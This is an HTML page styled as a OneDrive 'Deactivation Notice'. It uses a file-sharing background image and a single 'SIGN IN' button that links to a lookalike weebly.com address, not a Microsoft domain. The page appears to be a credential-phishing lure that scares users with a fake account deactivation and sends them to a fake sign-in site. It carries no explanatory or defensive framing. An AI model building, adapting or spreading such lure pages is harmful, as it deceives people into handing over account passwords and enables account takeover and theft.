<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Deactivation Notice</title>
  <!-- Google Fonts -->
  <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet">
  <!-- Bootstrap CSS from a CDN -->
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css" rel="stylesheet"
    integrity="sha384-4bw+/aepP/YC94hEpVNVgiZdgIC5+VKNBQNGCHeKRQN+PtmoHDEXuppvnDJzQIu9" crossorigin="anonymous">
  <!-- External CSS -->
  <link rel="stylesheet" href="styles.css">
  <style>
    body, html {
      height: 100%;
      margin: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      background-image: url('https://www.hawkdive.com/media/How-to-Stop-Sharing-OneDrive-Files-and-Folders-in-Windows-11.jpg');
      background-size: cover;
      background-position: center;
      background-repeat: no-repeat;
    }
    .btn-primary {
      padding: 15px 30px;
      font-size: 1.5rem;
      border: 1px solid rgba(0, 0, 0, 0.1);
    }
    .overlay {
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      text-align: center;
      background: rgba(255, 255, 255, 0.8);
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.2);
    }
  </style>
</head>

<body>
  <div class="overlay">
    <a href="https://onedriverrrrrrfiy.weebly.com/" class="btn btn-primary" rel="noopener">SIGN IN</a>
  </div>
  <!-- Bootstrap JavaScript Bundle with Popper -->
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-pzjw8f+UAHO2KHr/Yp1b+AJS7jR7+6qX0Zqzlv8jaJq+w1pIbsMci+21O6OHIqFf"
    crossorigin="anonymous"></script>
  <!-- Content Security Policy -->
  <meta http-equiv="Content-Security-Policy" content="default-src 'self' https:; script-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net/npm/; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; font-src 'self' https://fonts.gstatic.com;">
</body>

</html>